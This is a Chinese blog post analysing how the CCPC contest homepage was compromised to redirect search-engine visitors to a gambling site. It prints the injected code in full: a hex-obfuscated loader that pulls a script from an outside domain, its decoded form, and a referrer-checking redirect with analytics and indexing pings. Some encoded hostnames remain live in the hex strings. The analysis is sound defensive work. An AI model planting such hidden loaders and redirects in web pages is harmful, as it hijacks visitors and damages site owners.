CCPC被日调查
今天在群里看到说CCPC主页被日了,赶紧过来吃一波瓜,顺便看看是怎么实现的
简单测试之后发现,从搜索引擎过来就会跳转,而直接域名访问则不会,看一下主页的内容,发现了奇怪的代码
改的是HTML的header部分,顺便试了试登录注册什么的各种功能都没反应了,感觉是被打穿了把后台都改坏了?
代码
被日的部分估计就这段
菠菜站相关内容都给我用中文替换了,不给菠菜站引流哈。。。。
title keywords description都是百度搜索引擎抓取时的关键字,解码一下就是菠菜站简介,并且还注意到了如果不是百度抓取的话title就不是菠菜站,而是正常的CCPC名字
(现在爬虫都能执行js了吗,都开始模仿浏览器行为了?)
<title>某菠菜站名</title>
<meta name="keywords" content="菠菜站关键字。。。。"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="首页 - 中国大学生程序设计竞赛"}</script>
<meta name="description" content="菠菜站简介"/>
<script>var QDfSn1=QDfSn1||[];(function(){var BXcvs__L2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']("\x73\x63\x72\x69\x70\x74");BXcvs__L2['\x73\x72\x63']="\x2f\x2f\x62\x79\x33\x33\x35\x38\x39\x2e\x63\x6f\x6d\x2f\x6a\x71\x75\x65\x72\x79\x2e\x31\x2e\x33\x2e\x31\x2e\x6a\x73";var zqbrN3=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65']("\x73\x63\x72\x69\x70\x74")[0];zqbrN3['\x70\x61\x72\x65\x6e\x74\x4e\x6f\x64\x65']['\x69\x6e\x73\x65\x72\x74\x42\x65\x66\x6f\x72\x65'](BXcvs__L2,zqbrN3)})();</script>
辣鸡混淆,就单纯的编了个码,直接在console里跑一下就能快速解码
var QDfSn1=QDfSn1||[];
(function(){
var BXcvs__L2=window["document"]['createElement']("script");
BXcvs__L2['scr']="//菠菜跳板.com/jquery.1.3.1.js";
var zqbrN3=window["document"]['getElementsByTagName']("script")[0];
zqbrN3["parentNode"]["insertBefore"](BXcvs__L2,zqbrN3)
})();
往当前页面里添加一个菠菜魔改jQuery,打开看一看
GID89a="";
//var OPAlt1=new window["\x44\x61\x74\x65"]();var SZ2=OPAlt1['\x67\x65\x74\x53\x65\x63\x6f\x6e\x64\x73']();if(SZ2%5==0){window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66']='\x2f\x2f\x62\x6f\x62\x38\x38\x38\x38\x2e\x63\x6e\x2f'};
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?7b3656fe95ec73529221927b52290bee";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
var ref=document.referrer;
var baidu=ref.indexOf("baidu");
var soso=ref.indexOf("soso");
var google=ref.indexOf("google");
var sogou=ref.indexOf("sogou");
var sm=ref.indexOf("sm.cn");
var so=ref.indexOf("so.com");
var sbing=ref.indexOf("bing.cn");
if(baidu!=-1 || soso!=-1 || google!=-1 || sogou!=-1 || sm!=-1 || so!=-1 || sbing!=-1){
this_url = 'http://菠菜站.cn/m.php';
window.top.location.replace(this_url);
window.location.href=this_url;
}
(function () {
var bp = document.createElement('script');
bp.src = '//push.zhanzhang.baidu.com/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
开局一个GID98a,我怀疑是GIF98a打错了。。。还带waf绕过的?菠菜牛逼嗷
先一个自调用函数向https://hm.baidu.com 这个百度的访问统计网站发了一个请求,等于说还统计有多少人被日下来的CCPC导向到菠菜站
然后检查了一下referrer,如果是来自这几个搜索引擎就给你跳过去,所以直接访问ccpc是不会被转到菠菜的
后面还有一个自调用函数,是让百度的搜索引擎进行一波收录,等于说这个网站被访问一次就进行一次提交,太脏了
学到的奇怪东西
魔改jQuery中最后那个qihucdn(也是SEO优化类似的接口)没写成功,因为这个魔改jQuery已经是异步加载进来的了,因此此时主文档的渲染就已经结束了,不能再对主文档的Document进行操作,但是insertBefore还能用,有点高级
随便找的一个解释
https://blog.csdn.net/qq_26291823/article/details/75090069
抓包的时候并没有发现向这两个网站发送请求。。还以为是他哪里写歪了,研究了两分钟发现,是burp设置中某一项设置,不抓这几个文件扩展名(^gif$|^jpg$|^png$|^css$|^js$|^ico$)
,所以.js的请求发是发出去了,就是没抓到
实际上是请求了百度的hm和push两个js文件的
还有一点,因为点开就跳转时间太短,又不会在浏览器里面下断点调js,一开始都不知道到底是他的js写歪了还是我抓包的问题,后来老国王提出burp抓包然后把跳转的包拦住慢慢看就行了。。。我太蠢了,再后来发现直接访问域名不就不跳转了吗。。。并且代码也不会变
后记
所以说搞这个不是比复习有意思多了,呜呜,为什么我要学信息论和通信原理